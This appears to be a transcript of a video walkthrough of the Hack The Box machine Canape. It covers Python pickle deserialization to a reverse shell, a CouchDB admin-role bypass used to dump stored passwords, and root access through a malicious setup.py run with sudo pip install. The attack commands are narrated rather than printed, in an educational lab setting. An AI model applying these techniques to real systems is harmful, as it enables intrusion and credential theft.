Hello everyone and welcome to another edition of Can You Hack It? I am your host Ben, aka Iceman, and this week we're going to be on Hackthebox.eu again, this time looking at a system called Canape. It's a Linux box with a bit over a medium level of difficulty. So we can see here the IP address is 10.10.10.70, so let's go ahead and get started. We'll make a directory for Canape, and we'll make our nmap directory at the same time. Then we'll switch into Canape and we'll get our nmap started. So we'll do nmap-t5 to make it aggressive with the timing, sc and sv to run enumerate scripts and versions, and then OA to output all formats, and we'll output them to nmap/quick. And then of course the IP address of the box is 10.10.10.70. And typoed. And so it looks like we've only got one port open, port 80. Looks like it's a Simpsons fan site. One of the things we noticed is nmap actually was able to pick up a Git repository that was available there at .git. So we will take a look at that. We can see that the remote Git repository's name is git.canape.htb. And so real quick, I suppose we can clone that. First thing we're going to want to do is just create a entry in our Etsy host. So we've been Etsy hosts, and we add an entry for 10.10.10.70 and git.canape.htb. Now technically I think you can clone it without that, but it makes it a little bit easier because now we can just do a git clone http://git.canape.htb/simpsons.git. And so that's cloned now. As we can see, there's a Simpsons directory. Let's take a quick look at it in our browser. And as you'll notice, we've got burp open again. The reason for that, and actually to make sure we have intercept turned off, is so that we can just have a nice little record of all the requests that we've made during this in case there's something we want to go back and look at. So if we go to the site, it looks like it is a Simpsons fan site. So we've got view quotes, we've got various quotes, we've got submit quotes, and it looks like we can submit something here. So character Bob, or Bobo, I guess, and ... So it looks like it has some sort of checking on the name of the characters. So we're able to submit as long as the character name is legit, it looks like. So let's take a look at the source code since we have it and kind of see how this works. So if we change directories into Simpsons, ls, it looks like we've got an __init.py, a static, and a templates folder. So this is probably some Python web framework. ls-l static. Yeah, it looks like it's got some CSS and JavaScript files. Templates, I'm sure, probably has some sort of template format. So init.py is probably where our logic is. So if we have vim init.py, so we can see it imports Couchdb, so we know to look at that if we get on the system. It looks like cpickle. So cpickle is promising, which we'll cover here in a second. And then it imports some stuff from Flask and MD5 from hashlib. So it looks like it creates a Flask app, which is a Python web framework, has a database connection. Looks like it's got a custom error handler, index returns index.html. The quotes page looks like, yeah, it just renders the quotes that are in the DB. It's got a whitelist. These are our names of characters probably that we're checking against. So here's our submit form. If it's a post, it gets the character value, the quote value, make sure that the character and the quote aren't blank, checks to see if the character's in the whitelist. And then we've got an else here with a to-do that says pickle into dictionary instead, check is ready. And so it's got a ID it's creating by doing an MD5 of the character in the quote, and then it writes to a temp file, and then it outputs to that file, closes, sets success as true, and returns the render template. And then further down, it looks like we've got a check function. This check function looks like it loads a value from that temp directory, the .p file that's submitted as an ID to the check form when you post. It reads it in. If it's got P1 in it, then it tries to load it as a pickle. Otherwise, it just loads it as a string, it looks like. And then it returns still reviewing and the string. So there's a potential problem here. This P1 that it's checking for, if it happens to be in there, it does this cpickle load. And pickle is a stack language in Python that allows us to serialize objects. And so it also allows us to execute arbitrary Python code if we structure our pickle just right. And so that will be the way that we likely get in on this system, is by abusing this. And what we can do to test it out is run this server or the application locally. That way we can kind of get an idea of the inner workings of it. I think that's a problem that a lot of people had. I got tons and tons and tons of questions on this box, and most of them had to do with how to figure out when things were working and weren't working. People seem to overlook the fact that you can run these things locally if you get access to the source code. If you can, do it way easier. You get a lot more visibility. So let's go ahead and take a look at, actually I think I have a blog post on it I can pull up that talks about pickle a little bit. That way you get some details on how this is going to work. So we pull up the browser. Let's go to bengruel.com. And because I'm using burp, it's giving an issue here, which is fine. Interesting, it's not letting me actually bypass it. So how you handle that is you go to just burp, I think. And this is your local burp server. You can get your certificate file, you can save it. You can go in here, preferences, advanced, certificates, view certificates, import, where that downloaded. Use it, trust it to identify websites. So now, if I try to go there, the reason that happened is because my site will only serve over HTTPS, and so we have an article here on a recipe for rotten pickles with Python, and so it kind of covers really quick what the basics are with abusing pickle. And so you can see here a simple example where we've got cost, system, this bin echo blah, tr. And so basically we break down what this does. This first line, COS, the C tells pickle to read until the new line and read in what it sees as a module that it's going to import. And so in this case, it's OS. The next line is a function within that module, in this case system, that it's going to call. And then this first, the parentheses here, it's a marker letting it know where on the stack to pop things off till. The capital S tells it to read a string inside of quotes, which is what we have next. And then that string inside of quotes is read onto the stack. And basically the rest of it, so this is what it would look like at that point as code, by the way. You can read this article if you're interested. And then the TR is basically telling it to pop things off the stack as a tuple and call it. And then the period, which is actually the important part, which is why it's highlighted here. This seemed to be what a lot of people missed, is that period tells it that it's done. That's the end of the pickle. And so the period is kind of the secret to creating a payload for this, because a lot of people tried to do things like stick Homer as the name and their payload as the quote. And the problem you would have with that is Homer would end up being, because of the way that the application's concatenating those, Homer would be at the beginning of your pickle. Homer's not valid for a pickle, your pickle fails, that's it. And if you did the opposite and you stuck your pickle in the user, or the character, and you put just some junk in quote, you should be fine, because as long as the junk's concatenated after the period, you're good to go. And so this basically covers a lot of those details. There's a part 2 also that goes into a little more depth. But for now, we can go ahead and not worry about that too much. Let's just see if we can get a pickle built that works. So if we quit out of this source code view and we get this running locally, to run the Flask app locally, we just have to export a variable, we'll call it called Flask_app, and tell it what the Python file is, and then we can just do a Flask run. And so then if we do export Flask_app equals __init.py, or sorry, __.py. And then we do Flask run, and it gives an error about Couchdb missing. In this case, since we don't care about viewing the quotes, what we can do is just comment this out. So we don't care about that. We don't care about that. So now it looks like it's running. It's running on our local host on port 5000. So if we browse it, 127.0.0.1.5000, we can see a copy of the same thing. I assume if we do view quotes, we're going to crash out, which we do because we don't have that database connection. Well, it looks like our app is still running though, so we're fine. So like we go to submit quote, we could submit Homer Doe, submit that, and submitted successfully. If we take a look in our temp folder now, we should see one of those .p files, so lsl temp, and we can see it right here. If we cat it, oops. Let's try that again. cat/temp/ec. And so we see Homer and Doe concatenated together. And so now let's try and actually create a payload that we can use to execute and get ourselves shell in the system. I was going to write it by hand, but it takes a bit of time. I figure there's already some good blog posts that I have on how to do it. So what we're going to do is just grab a file that I've actually made public on GitHub for these types of things to create pickles. And so we'll just look for that instead. I think it's rotten pickle and probably my name. Or here, GitHub gist. Gruel. Here we go. So if we look at this, we can see that we've got a couple user editable fields here. Basically a custom append, things that we want to stick on the end after that period to bypass filters. We've got the option to URL encode it. We've got type of line endings we want, and we've got safe characters, in other words, characters we don't want to URL encode. And then what we have here is we have a skeleton, and this basically uses what we were talking about before. So it imports types, uses the function type function, imports Marshall, loads. And so basically what it does is it creates a base64 encoded package that when executed, or when loaded by Pickle, automatically decodes itself and then executes the code inside of there. And so basically we have this wrapper function, and this wrapper function has what we actually want to execute in it. And so I've got some examples here of how you could create a bunch of functions and other stuff if you wanted to. In this case, we're not going to. We're just going to use a simple Python web shell. So we're going to import socket, subprocess, and OS, and we're going to create a connection back to our system. We're going to tie standard in, out, and air, and then we're going to call subprocess call bin bash. So it's pretty simple. There's just some extra parts that show how we're encoding. Base64 encoding and URL encoding, swapping out line endings, and then finally printing out our pickle. And so we will just take this and we'll create vim, or let's not do it in this directory, vim pickle.py. And so we need to change a couple spots. One's here, which is our IP address. 10, oops. 10, 10, 14, 15, port 1234. We're fine with sticking with bash for our shell. So for the custom appends, we do need something to remember. We need to bypass that filter that checks to see if any of the character names are in there. So we can have mo. And then also, if you remember, it in the check function, it looks for the value p1 being in there. So we need to have the value p1 also in our pickle. So we just do p1 mo. That should be good enough to bypass both of those filters. We do want a URL encode. Standard line endings are fine. Safe characters are fine. Everything else here should pretty much be okay. So we write that, and we do Python pickle.py. And so we get our final pickle output. So we take this, and you can see the P1mo at the end after the period, which is the critical part. So we take that, we go back to our local Simpsons fan site, we put that as the character, and for the quote, it doesn't matter. We'll just put a period. We submit that. It was able to be submitted. If we ls/temp, or what's the lsl/temp, so we can see we have a newer .p file here now. And so if we cat that, cat temp 7a, and so we can see that we basically have our payload here. We've got that extra dot from our quote, which shouldn't matter because it's after the initial dot that ends the pickle. Now I think everything else looks okay. So if we go ahead and try and execute this with the check function, then we need this ID, and we need to create a local listener. So if we do nc-lvnp 1234, so we're listening for that connection. And then we should be able to do a curl-d ID equals, and then xpost, and http://localhost 5000/check. Looks like we got an internal error. And if we go back here, and this is why I was saying run the local server, we can actually see the error here instead of just seeing a 500. So we got an exception on check. It looks like the pickle data was truncated, so there was something wrong with the pickle. Now we could try and take a look here and see if we can spot the difference, which at least quickly to me nothing pops out, but my assumption is because we submitted it through the browser that it may have done some encoding that we didn't want it to do. And so what we can do instead is go to our burp session that's open. We can find that in here. And then let's send it to repeater. And let's clear this out and put our payload back in there. So if we go up to here where we have our final pickle, copy that, and then paste it in here. Send that, and it looks like it took it just fine. So now if we take a look again, ls/temp, man, I can't type today. And so now we've got another one. Notice this has a different MD5 hash, so there definitely was something different about the two because we got different MD5s. So now if we try that same curl command, this time with this newer ID, and this time it hung, which is usually a good sign, and we can see here that we did get a connection from our local box. And so it looks like we are good with that payload. And so now all we need to do is flip that over so that we're using our real server instead. So we start our listener back up, and we can kill out of that now, and we can actually just modify our burp request. So we change the target here, change it to 10.10.10.70 and port 80. And we probably don't need to even worry about these fields, but just in case, 10.10.10.70 80, and do the same here. 10.10.10 70 port 80. Submit that. Again, we got that just fine. And then go back to where we did our curl from and change that to 10.10.10.70 port 80. Again, we hang. And now, as we can see, we've got a shell as www data on Canape. So now if we upgrade this shell to something a little more usable, do python-c import pty, pty.spawn bin bash. And then we can do a Control-Z to background that. We can do stty raw minus echo. Oops, fg to foreground it, reset, and xterm 256 color. Export shell equals bash, export term equals xterm 256 color. And so now we should have tab completion. Yeah, it's a little more usable shell to work from. So if we switch over to dev shm slash hidden, create a hidden directory over there. Oh, oops. Create it first. And then change to it. And then what we can do is download our Linenum script and run that, see if we can find any way to escalate to a different user. So we just change to another one of these windows. Cancel that out, I think. Let's copy Dropbox scripts, tools, scripts, Linenum, copy that locally, and then start a Python web server. On port 80. And then wget, pull it down over here. And then we'll make it executable, and we will run it. And it should be almost done. And remember, when we were looking at the source code for the site, there was the import of Couchdb. So that's going to be something we definitely want to look at, because especially in earlier versions, there was some exploits both for remote code execution and for adding users. And so once we get through all of this stuff, we'll start up at the top. Web junk in there. Okay, so we can see that it's Xennial, so 16.04, it's Ubuntu, hostname's Canape, we've got a user Homer and we've got a user root. Homer looks like he's actually currently connected. Hopefully he doesn't restart the system on us. So Homer and root still. Environmental variables, I don't see anything super interesting. Available shells looks default. Cron jobs. So we've got a bit of stuff listening, some of it on the local address only. This 5984, should be our Couchdb server, so it looks like it's listening only on the local host. So we would have two options there. We could A, create an SSH tunnel, like we did in last week's video, or we can just interact with it locally. As long as things are working locally, I'll probably just do it from the local host. And so it looks like Couchdb is running here, and it is running under root, it looks like. So that could be a potential way to get root access, is by doing command execution. So maybe we'll try that. I actually haven't done it before. I was curious if it was running as root. I didn't think it was, but it looks like it may be. Unless it's this here that's running. So nothing else looks super interesting. So let's go ahead and kind of poke around at that Couchdb installation. So if real quick, I'll pull up a page and we'll kind of look at how, see if I can find something that shows the problem with Couchdb. But basically Couchdb in its earlier versions had an issue where it was using I think it was like an Erlang parser and a JavaScript parser. And so when you submitted JavaScript, one of the parsers was being used for security and the other one was being used to actually decode and execute, I think. And so you could form your JavaScript so that the one that was doing it for security missed it and the other one executed it. And basically what it would allow you to do is you would include the field roles twice, one with the role of admin, one with the role of blank. And the blank role would pass one of the parsers, and then the other one would actually execute it and give you admin. And so because of the difference in the way that those two things worked, you're actually able to create an admin user without any permissions. And so let's see, actually it's probably not worth trying to find something to show you because that's basically what it is. We'll show you the code as we create our user. So if we just do, we can do this at the command line, I think we do curl x put, and then http://localhost and 5984 underscore users org.couchdb.user. And so this is a standard Couchdb user database, and so it's the way you interact with this you could look up online anywhere. And user, we can make Iceman and -- data binary. Sorry that this is formatting weird. I should have set the dimensions of the terminal so that it wasn't doing this weird wrapping. But the rest of these lines will be pretty clear. So we're going to create a type, user, name, Iceman. This is our first roles field, roles, admin. And so this is creating an admin role. Oh, oops, except for I mistyped that. We'll see if it doesn't care about the extra invalid field. Second roles, and this one's just going to be blank. And finally, password. We'll do please subscribe. And then we close off that JSON object. And so we get an OK back. And so now we should have a user. We can test that by using a curl command. So if we just do curl-x get http://localhost 5984. Oh, actually, we need to put our credentials in here first. So Iceman, please. Oh, I'm getting some weirdness there. Sorry. Let's try this again. Curl-x put http://Iceman, please subscribe at localhost 5984/all or /all DBS. So this should give us all databases. Did I put a quote in and forget to close it? I did. Oh, sorry, I didn't mean to put a put command. I meant to do a get command. This is why you want to set your terminal correctly. It's getting all wonky now. In fact, I'll clear it and do that command again. So we can see that there's the database global changes, metadata, replicator, underscore users, and passwords, and then the Simpsons database. The Simpsons database probably isn't super interesting since we saw all it's storing is the quotes in there. Passwords obviously could be interesting. Users is interesting. We could pull these by using curl commands. It's a little bit tedious, so instead, why don't we see if we can find, there's a good script out there for backing up. the Couchdb databases to a .json file. So if we just do a quick search for script couchdb.sh, I think is what it's called. Oh, Couchdb backup, I think. Oh, that's it right here, I think. So if we look at the raw view of this, and it's basically just see where it's at in here. Oh, anyway, it's just running commands to back up the database. And so if we now just do vim backup.sh and write that, that's fine. And so now we make that executable, chmod plus x backup.sh. So we can see the commands here. We want to run the script in backup mode. And we want to do host 127001 db of users, output to a file called _users.json. U is Iceman, P is please subscribe. So I successfully wrote that one. Actually, I'm going to type it again since this weird word wrap is kind of hard to read. So backup -b, H is localhost, and database is passwords. Output that to passwords.json. U Iceman P please subscribe. So backed up that one successfully. So now that we've got those, we can either take a look at them here, or actually let's pull them to our localhost because this weird word wrapping may make things difficult to look at. So we should be able to do a Python m simple HTTP server 8888. And then back on here, let's pull those down. So if we do a wget 10.10.10.70 8888, and it was _users.json. It's possible we have a firewall issue. See if we can't manage to cancel out of that. Okay, I actually had to fix that because it looks like whoever was on the system did a reset. Since I didn't have the web page up, I didn't see the request, so we lost our connection. But we appear to be back up now, so switch back into our working directory, which hopefully, let's see. Actually, didn't remember. If I remembered to put everything back, I did. Okay, so let's get that backup.sh and, or sorry, the users.json and the passwords.json. So if we cat users.json, and it's a big, ugly, unreadable thing. So if we cat users.json, let's see if they have the Python module on here, python-m json.tool. They do, although it's still kind of ugly, at least. Oh, I forgot to restore our shell, so that's fine. Let's pull these locally, I guess. We do python-m simple HTTP server. Let's try 8080. Change this to 8080. Looks like we're still having problems. So we'll just try to Set up a shell again. It's possible since the time that I originally did this box that they've set up firewall rules or something, because I used to be able to just create a local shell or a Python web server to send them down. Instead, we'll just cat them and then copy them over. Cat user.json. And users.json. And then them password.json. Cat password.json. Cat passwords.json. This one looks a little bit cleaner. Copy that, paste it, write it. So now if we cat password.json to python-m json.tool, we can see it in kind of a pretty printed format. So it looks like we've got a collection of usernames and passwords with tags for item. So we've got SSH with a password, we've got Couchdb with a password, user Couchy. We've got Homer for HomerSimpsonFanClub.com password. We've got an admin yelling at Homer to stop storing his passwords here. So if we take this and let's drop it into Sublime Text just so that we have it. Oops, didn't mean to actually open a whole new instance. And then let's take a look at users also. Cat users.json python json.tool. So that one does just have a bunch of weirdness at the top, I guess. So we've got, it looks like these are just the users that people created. So we've got a Bob and we've got Iceman. So probably nothing worth cracking there. This is probably just the user that somebody else created. This is one that I created. But we do have some passwords from Homer. So what we can do is try and see if we can SU as Homer. SU Homer must be in a terminal. Python-c dy dy.spawn and bash. And then Control Z. STTY raw echo FG reset X term 256 color. So now SU Homer wants a password. We can just start at the bottom, I suppose. It looks like the admin removed Homer's one there. Try HomerSimpson.com one. Failed. We can try the next one. Looks like it's relax on the couch, which was Couchy's password. And it looks like we won't be relaxing on the couch. So final one is this SSH password with no username. And it looks like that worked to log us in as Homer. So now that we're Homer, we can probably access the user file. So we ls home Homer. We can see users.text. So we cat home Homer user.text. Cut characters 1 to 16. And you can see that we can access the flag and we got the first 16. So user is done. Now we just need to move on to privesc to get root. Of course, we can see if we can read it now. Cat root.text cat C1 through 16. We can't. So what we need to do now is see if there's a way that we can get privilege escalation. We can run Lenny-Noom again to see what we see now that we're running as Homer. I typically like to first start out by just doing a sudo L, see what we can sudo. Make sure we got the correct password in our clipboard. And it looks like he can run pip install, which is interesting. Let's make sure real quick that he can't just sudo to root. No, he can't. So what we can do then is abuse the way pip install works. And so pip install is a package manager for Python, and it installs packages. And when you create packages, there's actually ways to create some custom install commands that run when the package is being installed. And so what we can do here, I think, is create some custom, or create a custom package that runs some code to give us a reverse shell. And so we'll start out, make sure that we get our reverse shell running. So ncat-lvmp, we'll do 4444, sorry, and c-lvmp. And then I suppose we can probably just edit this over here. Let's try this real quick. See if we can get our terminal fixed up a little bit better so we don't have that issue with the with not having enough columns and rows. So if we do a, let's see what the command is. Let's see, I think it's stty-a. Yeah, so 50 rows, 211 columns. So if we go back over here, we should be able to do stty rows, 50 columns, 211. I think that should fix that issue. So if we now go back and do a vim, well, actually first before we do that, let's create our directory structure. So we'll we'll call our package magic, and we can't because this is actually owned by www, so we'll make a new directory, Homer. We'll switch in there. Now we'll make magic. We'll make your magic again. And then in here, we'll just have our init.py. I don't know that we actually have to have anything in it even, but just in case, we'll throw some junk in there. We can just do def do something. Print, we did something. And we can just write that. And drop down, and then this is where we're going to do the actual magic. We're going to vim setup.py. And so now we're going to need to get all the various pieces. So we need import OS, import OS, and import socket, and these we're going to use for our reverse shell. And then from sub process, we can import call. And then for our setup tools stuff, to make this actually work with pip, we're going to need from setup tools import, we're going to need setup, and we're going to need install. So from setup tools dot command install, import install. And so now we're going to create a custom class. We'll be creative and call it custom class, custom, or we'll call it custom install shell or something. Doesn't really matter. And we'll subclass install, and inside there we'll define run. And this is where we're going to have it do what we want it to do when this executes. And I actually haven't tried this for getting a reverse shell, so I'm going to do a backup plan here so that we don't have to waste time if this fails. Backup plan will be that we're going to copy root.txt into the directory we're in and give ourselves permission to read it. So if we do root is equal to open root.txt, open that and read, and we'll do a read. And then we will do out is equal to open dev shm.homer root.txt. We'll make that right with a pen. I don't know why that matters. It doesn't, since it's a new file. And we'll just do an out.write root and out.close. And then here, let's do our reverse shell. And so we'll do an s is equal to socket.socket. And this is a typical reverse shell you see everywhere. af inet socket.sockstream, and then s.connect. And we'll connect to our local host here on port 4444. And we're going to duplicate all of the standard in, out, and air. And finally, we're going to make our process call. So P is equal to call, then dash I. And that should be good for that function. And then now we just need to create setup, name, and I'm not sure how many of these fields are needed, but I usually just put them all in here because I don't know how many. Version can be whatever we want. Description, exploit. Probably want to give it something a little more covert. Could have called it magic, I guess. URL, http://something.com. Author is equal to Iceman. Author email is equal to iceman@email.com. And so all these fields probably aren't required, but because I don't want this to fail and have to keep going back into here, I'll just put them in anyway. License, I think. Again, MIT licensed. Packages, I think, is the next one, and that's magic. And then zip, safe, which it's not. And then CMD class is equal to install. Oops. We're overriding that to be our custom install shell. And I will be amazed if this actually works the first time because I always make typos. So we've still got our listener running over here. So all we should have to do is a sudo pip install dot. And looks like we typoed something or something didn't work. Connect takes exactly one argument and we gave two. Oh, yeah, I forgot to double up the quotes probably. So we'll wait for this to air out. And then we'll edit that and setup.py. Yep. So we just need to make this a tuple. And let's try that again. Sudo pip install dot. Not getting an error this time, so that's good. I actually just realized as we have the code up here, this probably isn't going to be readable by us still because we're running this as root and we didn't do a chmod or a chown or something to change it so that either everybody can read it or that we own it. So we would need to do the pcall chown and chown this file in order for us to be able to read it. Since we're still on here, I'm guessing we have our shell. We do, and we're root. Who am I? You can see we're root. We're in some weird temp pip directory. And so now all we should have to do is cat root.text cat-c 1 through 16. Here you can see that we can access the root flag, and those are the first 16 characters of it. And so that is how you do this box. There's a couple good articles to read on my website about Python Pickle if you're interested in finding out more. There's tons of stuff about exploiting pip also, the pip setup process. So you can look into that. But that's all there is to this box. I hope you enjoyed the video and have a great weekend. Feel free to like the channel or subscribe to the channel, like the video. Visit me on Hackthebox, follow me on Twitter. Fair warning on Hackthebox, I haven't been on there a lot lately. I've been really busy with work and other things. So if I don't respond to you right away, I'm sorry, but you know, it's kind of a lower priority right now. So As long as I have boxes that I've already done, I'll keep making these videos, but at some point they may slow down a bit unless work slows down. Anyway, everybody have a great weekend, and I'll see you on the next video.